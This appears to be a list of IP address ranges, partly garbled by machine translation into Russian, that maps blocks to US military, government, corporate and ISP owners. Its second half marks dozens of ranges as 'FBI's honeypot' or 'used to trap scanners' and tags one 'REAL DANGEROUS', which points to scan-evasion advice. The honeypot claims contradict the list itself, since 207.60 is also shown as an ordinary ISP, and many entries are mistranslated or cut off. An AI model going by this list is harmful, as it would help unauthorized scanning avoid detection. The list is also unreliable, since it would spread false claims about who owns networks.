Третья Армия Соединенных Штатов (СЕТЬ-AC2IS1)<br />144.146.0.0 Командующий, Армейский Информационный Центр Систем (СЕТЬ-FTIRWIN1)<br />144.147.0.0 Командующий, Армейский Информационный Центр Систем (СЕТЬ-FTIRWIN2)<br />144.192.0.0 Армейская Информационная Команда-Campbell Услуг Соединенных Штатов (NET-CAMPBELL-GW1)<br />144.232. * Sprintlink, США<br />144.233.0.0 Спецслужба Защиты (СЕТЬ-DODIIS1)<br />144.234.0.0 Спецслужба Защиты (СЕТЬ-DODIIS2)<br />144.235.0.0 Спецслужба Защиты (СЕТЬ-DODIIS3)<br />144.236.0.0 Спецслужба Защиты (СЕТЬ-DODIIS4)<br />144.237.0.0 Спецслужба Защиты (СЕТЬ-DODIIS5)<br />144.238.0.0 Спецслужба Защиты (СЕТЬ-DODIIS6)<br />144.239.0.0 Спецслужба Защиты (СЕТЬ-DODIIS7)<br />144.240.0.0 Спецслужба Защиты (СЕТЬ-DODIIS<br />144.241.0.0 Спецслужба Защиты (СЕТЬ-DODIIS9)<br />144.242.0.0 Спецслужба Защиты (СЕТЬ-DODIIS10)<br />144.247.0.0 SUPSHIP, Groton, U.S.N. (СЕТЬ-SOSGNET)<br />144.249.0.0 Воздушные Продукты и Химикалии, Объединенные (NET-APCI-NET)<br />144.252.0.0 Армия США LABCOM (NET-LABCOM-ETDL)<br />145.0.0.0 - 145.255.255.255: Niederlande, Frankreich und Deutschland<br />147.103.0.0: Армейский Информационный Центр Программного обеспечения Систем<br />147.104.0.0: Армейский Информационный Центр Программного обеспечения Систем<br />147.164.0.0: Армейская Информационная Команда Систем<br />147.165.0.0: Армейская Информационная Команда Систем<br />147.198.0.0: Армейская Информационная Команда Систем<br />147.199.0.0: Армейская Информационная Команда Систем<br />147.238.0.0: Армейская Информационная Команда Систем<br />147.240.0.0: Американская Армейская Автомобильная резервуаром(танком) Команда<br />147.251. [ContacTel, Чешская республика<br />149.201.0.0: Fachhochschule Ахен (ЧИСТАЯ ЛВС ЦВК)<br />149.202.0.0 - 149.202.255.255: Siemens Никсдорф Информэйшнссистем АГ<br />149.202.0.0 - 149.204.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC<br />149.203.0.0 - 149.203.255.255: Medizinische Akademie Магдебург<br />149.204.0.0 - 149.204.255.255: Alcanet International Deutschland GmbH<br />149.205.0.0: Пожарный гидрант Merseburg<br />149.206.0.0 - 149.206.255.255: Thyssen Stahl AG<br />149.206.0.0 - 149.251.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC<br />149.207.0.0: Telefunken Systemtechnik Ульм<br />149.211.0.0 - 149.211.255.255: Thyssen Stahl AG<br />149.212.0.0: Siemens-Nixdorf Информэйшнссистемер А/с<br />149.216.0.0 - 149.216.255.255: Degussa AG<br />149.217.0.0: Max-Planck-Institut f&#252;r Kernphysik<br />149.218.0.0: Hirschmann and Co<br />149.219.0.0: Вестдеучер Рандфанк Коелн<br />149.220.0.0: Forschungszentrum Rossendorf<br />149.221.0.0: Rheinisch Bergische Presse-Data GmbH<br />149.222.0.0 - 149.222.255.255: Fachhochschule Киль<br />149.232.0.0 - 149.232.255.255: Quantum Software GmbH<br />149.233.0.0: Lahmeyer International GmbH<br />149.234.0.0 - 149.234.255.255: Schering AG Берлин<br />149.235.0.0: iXOS Software GmbH<br />149.236.0.0: Bruker Analytische Messtechnik GmbH<br />149.237.0.0 - 149.237.255.255: Wiechers and Partner Datentechnik GmbH<br />149.238.0.0 - 149.238.255.255: ZF Friedrichshafen AG<br />149.239.0.0 - 149.239.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC<br />149.240.0.0 - 149.240.255.255: Carl Schenk AG<br />149.242.0.0 - 149.242.255.255: Koerber AG<br />149.243.0.0: ЭРНО Раумфарттечник<br />149.244.0.0: Knorr-Bremse AG, M&#252;nchen<br />149.246.0.0: Siemens АГ, OeN NKE A2<br />149.248.0.0: TA Triumph-Adler AG<br />149.250.0.0: Hoechst AG, Франкфурт<br />149.251.0.0: Electricite de Франция - Исследование Этюдов Руководства(Направления)<br />149.252.0.0: USDOE, НЕГОЛОСУЮЩИЕ Операции(Действия) Office<br />149.253.0.0: DIRM/ITD<br />149.254.0.0 - 149.254.255.255: Mercury Personal Communications, Ltd.<br />149.99.130.*-149.99.150.*: Поставщик Kanadischer<br />145.253.*.*: Arcor<br />149.225.*.*: MSN<br />150.144.0.0: НАСА Центр Полета(Рейса) Места(Космоса) Goodard<br />150.149.0.0: Армейская Информационная Команда Систем<br />150.197.0.0: Научно-исследовательский институт Космоса Кореи<br />151.3.0.0 - 151.3.255.255 IUnet (NET-IUNET-BNET3)<br />152.203.*.*: Compuserv<br />152.166.*.*: AOL<br />152.170.*.*: AOL<br />152.172.*.*: AOL<br />152.205.*.*: AOL<br />152.207.*.*: AOL<br />153.92.0.0: Deutsches Forschungsnetz<br />153.93.0.0: Bundesanstalt f&#252;r Wasserbau<br />153.94.0.0: Transtec AG<br />153.96.0.0: Fraunhofer Institut f&#252;r Информация - und Datenverarbeitung IITB<br />153.97.0.0: Fraunhofer Institut f&#252;r Информация - und Datenverarbeitung IITB<br />153.98.0.0: Евроконтроль(Евроуправление) Карлсруэ<br />153.99.0.0 - 153.99.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC<br />153.100.0.0: RWE Energie AG<br />153.101.0.0 - 153.101.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC<br />155.7.*.*: Американец Вызывает Информацию (NET-AFISHQ-NET1)<br />155.8.*.*: Американский Гордон ArmyFort (NET-GORDON-NET5)<br />155.9.*.*: Армейская Информационная Команда Систем Соединенных Штатов (NET-LWOOD-NET2)<br />155.74.*.*: PEO STAMIS (СЕТЬ-CEAP2)<br />155.75.*.*: Американский Армейский Корпус Инженеров (СЕТЬ-CEAP3)<br />155.76.*.*: PEO STAMIS (СЕТЬ-CEAP4)<br />155.77.*.*: PEO STAMIS (СЕТЬ-CEAP5)<br />155.78.*.*: PEO STAMIS (СЕТЬ-CEAP6)<br />155.79.*.*: Американский Армейский Корпус Инженеров (СЕТЬ-CEAP7)<br />155.80.*.*: PEO STAMIS (СЕТЬ-CEAP<br />155.81.*.*: PEO STAMIS (СЕТЬ-CEAP9)<br />155.82.*.*: PEO STAMIS (СЕТЬ-CEAP10)<br />155.83.*.*: Американский Армейский Корпус Enginers (СЕТЬ-CEAP11)<br />155.84.*.*: PEO STAMIS (СЕТЬ-CEAP12)<br />155.85.*.*: PEO STAMIS (СЕТЬ-CEAP13)<br />155.86.*.*: Американский Армейский Корпус Инженеров (СЕТЬ-CEAP14)<br />155.87.*.*: PEO STAMIS (СЕТЬ-CEAP15)<br />155.88.*.*: PEO STAMIS (СЕТЬ-CEAP16)<br />155.178.*.*: Федеральное управление авиации (ЧИСТОЕ FAA)<br />155.213.*.*: Форт USAISC Benning (СЕТЬ-FTBENNNET3<br />155.214.*.*: Директор Информационного Управления (NET-CARSON-TCACC)<br />155.215.*.*: БАРАБАН USAISC-FT (NET-DRUM-TCACCIS)<br />155.216.*.*: Руководство проектом TCACCIS Office (NET-FTDIX-TCACCI)<br />155.217.*.*: Управление Информационного Управления (СЕТЬ - EUSTIS-EMH1)<br />155.218.*.*: USAISC (NET-WVA-EMH2)<br />155.219.*.*: Подоконник Форта DOIM/USAISC (NET-SILL-TCACCIS)<br />155.220.*.*: USAISC-DOIM (NET-FTKNOX-NET4)<br />155.221.*.*: Порядок USAISC-футов (NET-FTORD-NET2)<br />156.*.*.*: Американские Суды, Siemens, государство Штата Миннесота<br />158.3.0.0: Армия США TACOM<br />158.8.0.0: Американский Армейский Центр Поддержки Солдата<br />158.12.0.0: Американская Армия Лаборатории Гарри Диамонда<br />159.1.0.0: Департамент Штата Вашингтон государства и Ind.<br />159.206.0.0: Эр-Канада<br />160.46.0.0: BMW AG, Берлинский завод<br />160.47.0.0: BMW AG, завод Dingolfingen<br />160.48.0.0: BMW AG, завод Landshut<br />160.49.0.0: BMW AG, Мюнхенский завод<br />160.50.0.0: BMW AG, Мюнхен исследует и admin. участки(сайты)<br />160.51.0.0: BMW AG, Регенсбургский завод<br />160.52.0.0: BMW AG, завод Стейра<br />160.132.0.0: Американская Команда Пополнения(Вербовки) Армии<br />163.12.0.0: Морская Поставка Авиации Office<br />164.59.0.0 - 164.60.0.0: Schering AG (NETBLK-TBLK-SCHERING)<br />164.60.0.0: Schering AG (СЕТЬ-SCHERING2)<br />164.61.0.0: Kaufhof Holding AG, Koeln<br />164.224.0.0: Министр ВМС (NET-SECNAV-LAN)<br />164.225.0.0: Армия США Сведения(Интеллект) и Команда Безопасности<br />164.231.0.0: Военная Команда Sealift<br />169.*.*.* неплатеж окон<br />169.120.*.*: J. P. Morgan and Co (США)<br />171.224.*.*: AOL Deutschland<br />171.223.*.*:???<br />172.16. [XS4ALL, Нидерланды<br />172.128-180.*.*: Служба AOL, Inc.<br />192.114.63.*: Netvision<br />192.168. [частная сеть<br />193.*.*.*: lahm<br />193.79.178.*: UUNet<br />193.101.100.*:Siemens<br />193.122.199.*:SONNET (Flatrate) (МАЛЫШ(СУММА))<br />193.159.*.*: T-Online<br />193.189.224.*: Siemens<br />193.189.231.*: Siemens<br />193.190.215.*:SONNET (Flatrate) (МАЛЫШ(СУММА))<br />194.8.193.*: Чистый Кельн<br />194.8.197.*: Чистый Кельн<br />194.31.232.*: Де-CIX<br />194.90.0.*: Netvision<br />194.100. * MBinternet, Финляндия<br />194.121.59.*: Microsoft<br />194.174.230.*:Siemens<br />194.179.124.*:Microsoft<br />194.203.122.*:UUNet<br />194.230.*.*: PLUSNET AG (Schweitz)<br />195.3.*.*: T-Online<br />195.7.49.*: Siemens<br />195.10.*: (honeypot ФБР)<br />195.40.101.*: Siemens<br />195.66. * Sonera, Нидерланды<br />195.86. * Chello/Capacity, Нидерланды<br />195.93.*.*: AOL Deutschland<br />195.130. [Бандура, Бельгия<br />195.186.*.*: Bluewin (Schweiz)<br />195.238.160.*: СОНЕТ (Flatrate) (МАЛЫШ(СУММА))<br />195.238.164.*: СОНЕТ (Flatrate) (МАЛЫШ(СУММА))<br />195.238.163.*: СОНЕТ (Flatrate) (МАЛЫШ(СУММА))<br />195.238.174.*:SONNET (Flatrate) (МАЛЫШ(СУММА))<br />199.31.0.0 - 199.31.255.0: американская Армейская Информационная Команда Систем<br />199.203.4.*: Netvision<br />199.203.230.*:Microsoft<br />204.34.138.0 GSI (NET-GSI-13<br />204.34.139.0 ШТАБ - КВАРТИРА, JFMO Корея, Штаб (NET-JFMO-KOREA)<br />204.34.140.0 DISA D75 (СЕТЬ-TPOCNET)<br />204.34.141.0 Американское Военно-морское Воздушное Средство(Ссуда), Atsugi Япония (СЕТЬ-NAFATSUGI01)<br />204.34.142.0 Военно-морской Срочнослужащий Центр Управления Персонала (СЕТЬ-DMCCNHUB)</p> <p>204.34.143.0 На плаву Обучающаяся Группа Tихий океан (СЕТЬ-ATGPAC)<br />204.34.144.0 ШТАБ - КВАРТИРА Специальная Команда Операций(Действий) - Европа (ШТАБ - КВАРТИРА SOCEUR) (СЕТЬ-SCCIS)<br />204.34.145.0 Морская база Командующего Перл-Харбор (СЕТЬ-CNBGW)<br />204.34.147.0 Программа Усовершенствования Управления Информации NAVSEA (NET-TII-NET)<br />204.34.148.0 Q112 (СЕТЬ-Q112) </p> <p>204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures (NET-ASSIST-149) <br />204.34.150.0 Resource Consultants, Inc. (NET-RCIADP) <br />204.34.151.0 Personnel Support Activity, San Diego (NET-PSASD) <br />204.34.152.0 NAVAL AIR FACILITY, ADAK (NET-LEVEL2ADAK) <br />204.34.153.0 NAVSEA Logistics Command Detachment (NET-NSLC) <br />204.34.154.0 PEARL HARBOR NAVAL SHIPYARD (NET-PHNSY-NET1) <br />204.34.155.0 PEARL HARBOR NAVAL SHIPYARD (NET-PHNSY-NET2) <br />204.34.156.0 Defense Photography School (NET-DPHSCH) <br />204.34.157.0 - 204.34.160.0 Defense Information School (NETBLK-DINFOSNET1) <br />204.34.161.0 Naval Air Systems Command (NET-PMA-222) <br />204.34.162.0 Puget Sound Naval Shipyard (NET-PSNS-RMC) <br />204.34.163.0 Joint Precision Strike Demonstration (NET-JPSD-EH) <br />204.34.164.0 Naval Pacific Meteorology and Ocean (NET-NPMOCW-cool.gif <br />204.34.165.0 Joint Precision Strike Demonstration (NET-JPSD-ES) <br />204.34.167.0 USAF (NET-DMSHELPDESK) <br />204.34.168.0 Commander (NET-THIRDNCB-LAN) <br />204.34.169.0 Naval Air Warfare Center (NET-MSAICN) <br />204.34.170.0 Naval Air Systems Command (NET-NADEP) <br />204.34.171.0 NAVSTA SUPPLY DEPARTMENT (NET-GTMOSUPPLY) <br />204.34.173.0 SUBMEPP Activity (NET-SUBMEPP-NET5) <br />204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN (NET-SEVENFLEET) <br />204.34.176.0 DISA-PAC,IPC-GUAM (NET-DIPCGU) <br />204.34.177.0 Satellite Production Test Center (NET-SPTC-CS) <br />204.34.181.0 940 Air Refueling Wing (ARW) (NET-ARW940-NET) <br />204.34.182.0 Defense Megacenter Warner Robins (NET-WR) <br />204.34.183.0 GCCS Support Facility (NET-GCCS-SUPPFAC) <br />204.34.184.0 Nav Air Tech Serv Facility-Detachment (NET-NATSFDET-WNY) <br />204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA (NET-NSFDG) <br />204.34.186.0 Defense Logistics Agency - Europe (NET-EURNET2) <br />204.34.187.0 NAVMASSO (NET-SNAP1-MATSGMERIDIAN) <br />204.34.188.0 Commander-In-Chief, US Pacific Fleet (NET-CPF-LAN1) <br />204.34.189.0 Defense MegaCenter - St Louis (NET-DMC-S-DFAS) <br />204.34.190.0 NAVMASSO (NET-HMX1MCAFQUANVA-SNAP) <br />204.34.192.0 HQ SOCEUR (NET-U-SIN) <br />204.34.193.0 Second Marine Expeditionary Force (NET-U22-NIP) <br />204.34.194.0 Second Marine Expeditionary Force (NET-U24-NIP) <br />204.34.195.0 Second Marine Expeditionary Force (NET-U26-NIP) <br />204.34.196.0 NAVCOMTELSTAWASHDC (NET-MISSI) <br />204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER (ISTC) (NET-ISTC) <br />204.34.198.0 Naval Observatory Detachment, Colorado (NET-FALCON1) <br />204.34.199.0 NAVILCODETMECH (NET-NAVILCOMECH1) <br />204.34.200.0 Navy Environmental Preventive Medicine (NET-NEHC-BURNED) <br />204.34.201.0 Port Hueneme Division, Naval Surf (NET-PHDNSWC) <br />204.34.202.0 Naval Facilities Engineering Housing (NET-NAVFAC) <br />204.34.203.0 NAVSEA Logistics Command Detachment (NET-NSLC2) <br />204.34.204.0 Naval Air Warfare Center (NET-OTT-NET) <br />204.34.205.0 Portsmouth Naval Shipyard (NET-PORTSNET) <br />204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER (ISTC) (NET-ISTCTC) <br />204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific (NETBLK-NETBLK-USNSMERCY204) <br />204.34.211.0 USAF Academy (NET-USAFA-GW-NET) <br />204.34.212.0 3rd Combat Service Support (NET-CSSG3-NIP) <br />204.34.213.0 1st Radio Battalion (NET-RDBN1-NIP) <br />204.34.214.0 OASD (Health Affairs) (NET-TRICARE) <br />204.34.215.0 Second Marine Expeditionary Force (NET-MEU26-SIP) <br />204.34.216.0 1st Marine Air Wing (NET-ASE1-NIP) <br />204.34.217.0 SA-ALC/LTE (NET-ITACNET) <br />204.34.218.0 3rd Marine (NET-MAR3-NIP) <br />204.34.219.0 Communications and Electronics (NET-MCBH-NIP) <br />204.34.220.0 G-6 Operations, III MEF (NET-DFW5BR-NIP) <br />204.34.221.0 G-6 Operations, III MEF (NET-DFW1-NIP) <br />204.34.222.0 G-6 Operations, III MEF (NET-DFW2-NIP) <br />204.34.223.0 G-6 Operations, III MEF (NET-DFW3-NIP) <br />204.34.224.0 G-6 Operations, III MEF (NET-DFW4-NIP) <br />204.34.225.0 Joint Interoperability Test Command (NET-JITC-RTD216.25.* &lt;-- REAL DANGEROUS<br />205.96-103.* :<br />205.97.*.* : (FBI's honeypot) <br />205.98.*.* : (FBI's honeypot) <br />205.99.*.* : (FBI's honeypot) <br />205.100.*.* : (FBI's honeypot) <br />205.101.*.* : (FBI's honeypot) <br />205.102.*.* : (FBI's honeypot) <br />205.103.*.* : (FBI's honeypot) <br />206.167. [Sherbrooke University, Canada <br />207.30.*.* : (FBI's honeypot) <br />207.31.*.* : (FBI's honeypot) <br />207.32.*.* : (FBI's honeypot) <br />207.33.*.* : (FBI's honeypot) <br />207.34.*.* : (FBI's honeypot) <br />207.35.*.* : (FBI's honeypot) <br />207.36.*.* : (FBI's honeypot) <br />207.37.*.* : (FBI's honeypot) <br />207.38.*.* : (FBI's honeypot) <br />207.39.*.* : (FBI's honeypot) <br />207.40.*.* : (FBI's honeypot) <br />207.41.*.* : (FBI's honeypot) <br />207.42.*.* : (FBI's honeypot) <br />207.43.*.* : (FBI's honeypot) <br />207.44.*.* : (FBI's honeypot) <br />207.45.*.* : (FBI's honeypot) <br />207.46.*.* : (FBI's honeypot) <br />207.47.*.* : (FBI's honeypot) <br />207.48.*.* : (FBI's honeypot) <br />207.49.*.* : (FBI's honeypot) <br />207.50.*.* : (FBI's honeypot) <br />207.51.*.* : (FBI's honeypot) <br />207.52.*.* : (FBI's honeypot) <br />207.53.*.* : (FBI's honeypot) <br />207.54.*.* : (FBI's honeypot) <br />207.55.*.* : (FBI's honeypot) <br />207.56.*.* : (FBI's honeypot) <br />207.57.*.* : (FBI's honeypot) <br />207.58.*.* : (FBI's honeypot) <br />207.59.*.* : (FBI's honeypot) <br />207.60.*.* : (FBI's honeypot) The Internet Access Company (NETBLK-TIAC-BLK) <br />207.61.*.* : FBI Linux servers used to trap scanners <br />207.62.*.* : (FBI's honeypot) <br />207.63.*.* : (FBI's honeypot) <br />207.64.*.* : (FBI's honeypot) <br />207.65.*.* : (FBI's honeypot) <br />207.66.*.* : (FBI's honeypot) <br />207.67.*.* : (FBI's honeypot) <br />207.68.*.* : (FBI's honeypot) <br />207.69.*.* : (FBI's honeypot) <br />207.70.*.* : (FBI's honeypot) <br />207.71.*.* : (FBI's honeypot) <br />207.72.*.* : (FBI's honeypot) <br />207.73.*.* : (FBI's honeypot) <br />207.74.*.* : (FBI's honeypot) <br />207.75.*.* : (FBI's honeypot) <br />207.76.*.* : (FBI's honeypot) <br />207.77.*.* : (FBI's honeypot) <br />207.78.*.* : (FBI's honeypot) <br />207.79.*.* : (FBI's honeypot) <br />207.80.*.* : (FBI's honeypot) <br />207.81.*.* : (FBI's honeypot) <br />207.82.*.* : (FBI's honeypot) <br />207.83.*.* : (FBI's honeypot) <br />207.84.*.* : (FBI's honeypot) <br />207.85.*.* : (FBI's honeypot) <br />207.86.*.* : (FBI's honeypot) <br />207.87.*.* : (FBI's honeypot) <br />207.88.*.* : (FBI's honeypot) <br />207.89.*.* : (FBI's honeypot) <br />207.90.*.* : (FBI's honeypot) <br />207.91.*.* : (FBI's honeypot) <br />207.92.*.* : (FBI's honeypot) <br />207.93.*.* : (FBI's honeypot) <br />207.94.*.* : (FBI's honeypot) <br />207.95.*.* : (FBI's honeypot) <br />207.96.*.* : (FBI's honeypot) <br />207.97.*.* : (FBI's honeypot) <br />207.98.*.* : (FBI's honeypot) <br />207.99.*.* : (FBI's honeypot) <br />207.100.*.* : (FBI's honeypot) <br />207.101.*.* : (FBI's honeypot) <br />207.102.*.* : (FBI's honeypot) <br />207.103.*.* : (FBI's honeypot) <br />207.104.*.* : (FBI's honeypot) <br />207.105.*.* : (FBI's honeypot) <br />207.106.*.* : (FBI's honeypot) <br />207.107.*.* : (FBI's honeypot) <br />207.108.*.* : (FBI's honeypot) <br />207.109.*.* : (FBI's honeypot) <br />207.110.*.* : (FBI's honeypot) <br />207.111.*.* : (FBI's honeypot) <br />207.112.*.* : (FBI's honeypot) <br />207.113.*.* : (FBI's honeypot) <br />207.114.*.* : (FBI's honeypot) <br />207.115.*.* : (FBI's honeypot) <br />207.116.*.* : (FBI's honeypot) <br />207.117.*.* : (FBI's honeypot) <br />207.118.*.* : (FBI's honeypot) <br />207.119.*.* : (FBI's honeypot) <br />207.120.*.* : (FBI's honeypot) <br />207.60.0.0 - 207.60.255.0 The Internet Access Company (NETBLK-TIAC-BLK) <br />207.60.2.128 - 207.60.2.255 Abacus Technology (NETBLK-TIAC-ABACUSTC) <br />207.60.3.0 - 207.60.3.127 Mass Electric Construction Co. (NETBLK-TIAC-MECC56-2) <br />207.60.3.128 - 207.60.3.255 Peabody Proberties Inc (NETBLK-TIAC-PEABISDN1) <br />207.60.4.0 - 207.60.4.127 Northern Electronics (NETBLK-TIAC-NORTHERELEC) <br />207.60.4.128 - 207.60.4.255 Posternak, Blankstein &amp; Lund (NETBLK-TIAC-PBL56) <br />207.60.5.64 - 207.60.5.127 Woodard &amp; Curran (NETBLK-TIAC-WCPORT) <br />207.60.5.192 - 207.60.5.255 On Line Services (NETBLK-TIAC-ONLINES-1) <br />207.60.6.0 - 207.60.6.63 The 400 Group (NETBLK-TIAC-400T1) <br />207.60.6.64 - 207.60.6.127 RD Hunter and Company (NETBLK-TIAC-RDHUNTER2) <br />207.60.6.128 - 207.60.6.191 Louis Berger and Associates (NETBLK-TIAC-BERISDN) <br />207.60.6.192 - 207.60.6.255 Ross-Simons (NETBLK-TIAC-ROSIMONS) <br />207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank (NETBLK-TIAC-ECSB) <br />207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee (NETBLK-TIAC-GLCAC12 <br />207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc (NETBLK-TIAC-DEDI) <br />207.60.8.0 - 207.60.8.255 Sippican (NETBLK-TIAC-SIPPICAN) <br />207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co (NETBLK-TIAC-ALPISDN) <br />207.60.9.32 - 207.60.9.63 Escher Group Ltd (NETBLK-TIAC-ESCHERT1-2) <br />207.60.9.64 - 207.60.9.95 West Suburban Elder (NETBLK-TIAC-WESTISDN) <br />207.60.9.96 - 207.60.9.127 Central Bank (NETBLK-TIAC-CENTRALT) <br />207.60.9.128 - 207.60.9.159 Danick Systems (NETBLK-TIAC-DCS12 <br />207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO (NETBLK-TIAC-ALPSISDN) <br />207.60.9.192 - 207.60.9.223 BSCC (NETBLK-TIAC-BSCC) <br />207.60.13.16 - 207.60.13.23 Patrons Insurance Group (NETBLK-TIAC-PATRON99) <br />207.60.13.40 - 207.60.13.47 Athera Technologies (NETBLK-TIAC-ATHERA1) <br />207.60.13.48 - 207.60.13.55 Service Edge Partners Inc (NETBLK-TIAC-SERVISDN-2) <br />207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League (NETBLK-TIAC-MCUL384) <br />207.60.13.64 - 207.60.13.71 SierraCom (NETBLK-TIAC-SIER384K) <br />207.60.13.72 - 207.60.13.79 AI/ FOCS (NETBLK-TIAC-AIFOC384) <br />207.60.13.80 - 207.60.13.87 Extreme soft (NETBLK-TIAC-DOWNIE) <br />207.60.13.96 - 207.60.13.103 Eaton Seo Corp (NETBLK-TIAC-EATON) <br />207.60.13.112 - 207.60.13.119 C. White (NETBLK-TIAC-PETROL) <br />207.60.13.120 - 207.60.13.127 Athera (NETBLK-TIAC-ATHERA-2) <br />207.60.13.128 - 207.60.13.135 Entropic Systems, INC (NETBLK-TIAC-ENTRO12 <br />207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates (NETBLK-TIAC-WOOD56) <br />207.60.13.160 - 207.60.13.167 Jamestown Distribution (NETBLK-TIAC-JAMES56) <br />207.60.13.168 - 207.60.13.175 C&amp;M Computers (NETBLK-TIAC-CRAMB-2 ) <br />207.60.13.176 - 207.60.13.183 ABC Used Auto Parts (NETBLK-TIAC-ABC56K) <br />207.60.13.184 - 207.60.13.191 Tomas Weldon (NETBLK-TIAC-TWELDON) <br />207.60.13.192 - 207.60.13.199 Tage Inns (NETBLK-TIAC-TAGE) <br />207.60.13.200 - 207.60.13.207 Control Module Inc (NETBLK-TIAC-CMOD56K) <br />207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems (NETBLK-TIAC-HCRAWLER) <br />207.60.13.216 - 207.60.13.223 Eastern Bearings (NETBLK-TIAC-EB56K) <br />207.60.13.224 - 207.60.13.231 North Shore Data Services (NETBLK-TIAC-NSDS) <br />207.60.13.232 - 207.60.13.239 Mas New Hampshire (NETBLK-TIAC-MASISDN) <br />207.60.14.0 - 207.60.14.255 J. A. Webster (NETBLK-TIAC-JAWFRT1-2) <br />207.60.15.0 - 207.60.15.127 Trilogic (NETBLK-TIAC-LOGIC384) <br />207.60.16.0 - 207.60.16.255 Area 54 (NETBLK-TIAC-AREA54) <br />207.60.18.0 - 207.60.18.63 Vested Development Inc (NETBLK-TIAC-VESTEDT-2) <br />207.60.18.64 - 207.60.18.127 Conventures (NETBLK-TIAC-CON56-2) <br />207.60.21.0 - 207.60.21.255 Don Law Company (NETBLK-TIAC-DONLAWT1-2) <br />207.60.22.0 - 207.60.22.255 Advanced Microsensors (NETBLK-TIAC-AMS384) <br />207.60.28.0 - 207.60.28.63 Applied Business Center (NETBLK-TIAC-APP56K-2) <br />207.60.28.64 - 207.60.28.127 Color and Design Exchange (NETBLK-TIAC-COLOR-2) <br />207.60.36.8 - 207.60.36.15 Shaun McCusker (NETBLK-TIAC-FINLAY) <br />207.60.36.16 - 207.60.36.23 Town of Framingham (NETBLK-TIAC-INFOSERV) <br />207.60.36.24 - 207.60.36.31 AB Software (NETBLK-TIAC-ABSADSL) <br />207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc (NETBLK-TIAC-SEABASS) <br />207.60.36.40 - 207.60.36.47 Next Ticketing (NETBLK-TIAC-NT256T1-2) <br />207.60.36.48 - 207.60.36.55 Dulsi (NETBLK-TIAC-DULSI) <br />207.60.36.56 - 207.60.36.63 The Internet Access Company (NETBLK-TIAC-PTIMJ) <br />207.60.36.64 - 207.60.36.71 Maguire Group (NETBLK-TIAC-MAGISDN) <br />207.60.36.72 - 207.60.36.79 Cogenex (NETBLK-TIAC-COGENEX-2) <br />207.60.36.88 - 207.60.36.95 AKNDC (NETBLK-TIAC-AKNDC) <br />207.60.36.96 - 207.60.36.103 McGovern election commitee (NETBLK-TIAC-MCGOVDED) <br />207.60.36.104 - 207.60.36.111 Digital Equipment Corp (NETBLK-TIAC-DECISDN) <br />207.60.36.112 - 207.60.36.119 PTR - Precision Technologies (NETBLK-TIAC-PTREB) <br />207.60.36.120 - 207.60.36.127 Extech (NETBLK-TIAC-EXTECH-2) <br />207.60.36.128 - 207.60.36.135 Manfreddi Architects (NETBLK-TIAC-MANELKUS-2) <br />207.60.36.144 - 207.60.36.151 Parent Naffah (NETBLK-TIAC-PARENT) <br />207.60.36.152 - 207.60.36.159 Darling Dolls Inc (NETBLK-TIAC-EMARTEL) <br />207.60.36.160 - 207.60.36.167 Wright Communications (NETBLK-TIAC-WRIGHT56) <br />207.60.36.168 - 207.60.36.175 Principle Software (NETBLK-TIAC-PRINCIPL) <br />207.60.36.176 - 207.60.36.183 Chris Pet Store (NETBLK-TIAC-CPETDIAL) <br />207.60.36.184 - 207.60.36.191 Fifteen Lilies (NETBLK-TIAC-GREYROSE) <br />207.60.36.192 - 207.60.36.199 All-Com Technologies (NETBLK-TIAC-ALLCOM1-2) <br />207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A. (NETBLK-TIAC-HEARTDOC) <br />207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc (NETBLK-TIAC-PREFMFG-2) <br />207.60.37.64 - 207.60.37.95 Apple and Eve Distributors (NETBLK-TIAC-AEDED99) <br />207.60.37.96 - 207.60.37.127 Nelson Copy Supply (NETBLK-TIAC-NCOP56K) <br />207.60.37.128 - 207.60.37.159 Boston Optical Fiber (NETBLK-TIAC-BOSISDN) <br />207.60.37.192 - 207.60.37.223 Fantasia&amp;Company (NETBLK-TIAC-FANTCOMP) <br />207.60.41.0 - 207.60.41.255 Infoactive (NETBLK-TIAC-INFOACT-2) <br />207.60.48.0 - 207.60.48.255 Curry College (NETBLK-TIAC-CURRY) <br />207.60.62.32 - 207.60.62.63 Alternate Power Source (NETBLK-TIAC-APSIS) <br />207.60.62.64 - 207.60.62.95 Keystone Howley-White (NETBLK-TIAC-KEYSTONE-2) <br />207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD (NETBLK-TIAC-BRIDG384) <br />207.60.62.160 - 207.60.62.191 County Supply (NETBLK-TIAC-CS384) <br />207.60.62.192 - 207.60.62.223 NH Board of Nursing (NETBLK-TIAC-NHBNDED99) <br />207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies (NETBLK-TIAC-LAUCHAM) <br />207.60.64.64 - 207.60.64.127 Phytera (NETBLK-TIAC-PHYTERA1) <br />207.60.66.0 - 207.60.66.15 The Network Connection (NETBLK-TIAC-TNC56) <br />207.60.66.16 - 207.60.66.31 Young Refrigeration (NETBLK-TIAC-YRDED135) <br />207.60.66.32 - 207.60.66.47 Vision Appraisal Technology (NETBLK-TIAC-VISIONT1) <br />207.60.66.48 - 207.60.66.63 EffNet 